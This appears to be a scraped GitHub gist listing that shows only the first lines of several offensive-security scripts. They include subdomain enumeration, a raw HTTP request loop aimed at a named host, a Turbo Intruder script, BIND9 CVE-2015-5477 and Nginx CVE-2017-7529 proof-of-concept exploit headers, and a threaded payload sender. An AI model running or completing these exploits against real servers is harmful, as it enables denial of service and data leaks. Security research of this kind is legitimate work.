This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# script for subdomain enumeration using 4 of the best tools with some APIs: | |
# * findomain: https://github.com/Edu4rdSHL/findomain | |
# * SubFinder: https://github.com/projectdiscovery/subfinder | |
# * Amass: https://github.com/OWASP/Amass | |
# * AssetFinder: https://github.com/tomnomnom/assetfinder | |
# | |
bold="\e[1m" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
while true | |
do | |
printf 'GET /?cb=xxx HTTP/1.1\r\n'\ | |
'Host: blanco-dev.eu2.frbit.net\r\n'\ | |
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n'\ | |
'Accept: */*\r\n'\ | |
'Accept-Language: en-US,en;q=0.5\r\n'\ | |
'Accept-Encoding: gzip, deflate\r\n'\ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time | |
import re | |
def queueRequests(target, wordlists): | |
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP | |
engine = RequestEngine(endpoint=target.endpoint, | |
concurrentConnections=5, | |
requestsPerConnection=1, | |
resumeSSL=False, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import socket | |
import sys | |
print('CVE-2015-5477 BIND9 TKEY PoC') | |
if len(sys.argv) < 2: | |
print('Usage: ' + sys.argv[0] + ' [target]') | |
sys.exit(1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
date_default_timezone_set('Asia/Jakarta'); | |
/** | |
* @Author: Eka Syahwan | |
* @Date: 2017-09-09 07:04:25 | |
* @Last Modified by: VanGans | |
* @Last Modified time: 2018-09-17 17:03:32 | |
*/ | |
error_reporting(0); | |
ini_set('memory_limit', '-1'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
date_default_timezone_set("Asia/Jakarta"); | |
define("OS", strtolower(PHP_OS)); | |
require_once "RollingCurl/RollingCurl.php"; | |
require_once "RollingCurl/Request.php"; | |
echo banner(); | |
enterlist: | |
$listname = readline("Enter list : "); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. | |
#!/usr/bin/python | |
# -*- coding:utf-8 -*- | |
# Nginx - Remote Integer Overflow Vulnerability | |
# CVE-2017-7529 | |
import requests | |
import logging |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import socket | |
import sys | |
print('CVE-2015-5477 BIND9 TKEY PoC') | |
if len(sys.argv) < 2: | |
print('Usage: ' + sys.argv[0] + ' [target]') | |
sys.exit(1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import sys | |
import struct | |
# construct the DNS query | |
def dnsquery(domain): | |
d = "" | |
for a in domain.split('.'): | |
d = d + struct.pack("!b" + str(len(a)) + "s", len(a), a) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from __future__ import print_function | |
from builtins import range | |
import sys | |
import threading | |
import socket | |
def setup(host, port): | |
TAG="Security Test" | |
PAYLOAD="""%s\r |